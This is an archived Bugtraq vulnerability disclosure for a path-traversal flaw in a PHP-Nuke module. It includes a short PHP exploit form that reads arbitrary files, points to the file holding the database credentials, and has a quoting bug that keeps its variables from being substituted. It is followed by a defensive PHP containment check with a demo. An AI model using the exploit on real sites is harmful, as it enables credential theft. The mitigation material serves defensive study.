Bugtraq mailing list archives
PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source / DB Credentials Disclosure
From: kingoftheworld92 () fastwebnet it
Date: 26 Nov 2007 20:51:32 -0000
---------------------------------------------------------------
Http://www.inj3ct-it.org              Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source Disclosure
---------------------------------------------------------------
#By KiNgOfThEwOrLd
---------------------------------------------------------------
Exploit

<?
/*
Usage: 31337.php?targ=http://[target]/[phpnuke_path]&file=[file]
Example: 31337.php?targ=http://victim.com/phpnuke&file=conf/settings.php
*/
$targ = $_GET['targ'];
$file = $_GET['file'];
echo '
<form action="$targ/modules.php?name=Script_Depository" method="post">
<input name="show_file" value="/../../$file" type="hidden">
<input value="show_file" name="op" type="hidden">
<input type="submit" value="Show Source">
</form>';
?>

Trick

In conf/settings.php there are the database credentials ;)
---------------------------------------------------------------
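The request in the post depends on the show_file value being allowed to carry "/../../" segments out of the module's directory. As an added example (not code from the post or from the NSN module), this is a containment check a source-viewer handler can apply before reading any file; the function name resolve_depository_file() and the directory layout are assumptions made for illustration.

```php
<?php
// Added example: hypothetical hardened lookup for a "show source" handler.
// resolve_depository_file() and the scripts/depository layout are assumed,
// not taken from the NSN Script Depository code.

function resolve_depository_file(string $baseDir, string $requested): ?string
{
    // Reject empty names and embedded NUL bytes before touching the filesystem.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "..", ".", repeated slashes and symlinks, and
    // returns false when the target does not exist.
    $full = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($full === false || !is_file($full)) {
        return null;
    }
    // Containment: the canonical path must sit below the canonical base.
    // The trailing separator stops "/depository_old" matching "/depository".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

// Constructed demo tree in the temp directory (sample data, not real config).
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'depot_demo_' . getmypid();
mkdir("$root/scripts/depository", 0700, true);
mkdir("$root/conf", 0700, true);
file_put_contents("$root/scripts/depository/hello.php", "<?php echo 'hi';");
file_put_contents("$root/conf/settings.php", "<?php /* constructed placeholder */");

$base = "$root/scripts/depository";
$samples = ['hello.php', '/../../conf/settings.php', "hello.php\0.txt", 'missing.php'];
foreach ($samples as $req) {
    $resolved = resolve_depository_file($base, $req);
    printf("%-32s => %s\n", json_encode($req), $resolved === null ? 'rejected' : 'served');
}
```

Only the first sample resolves inside the base directory; the traversal form from the post canonicalizes to the conf directory and is rejected by the prefix check.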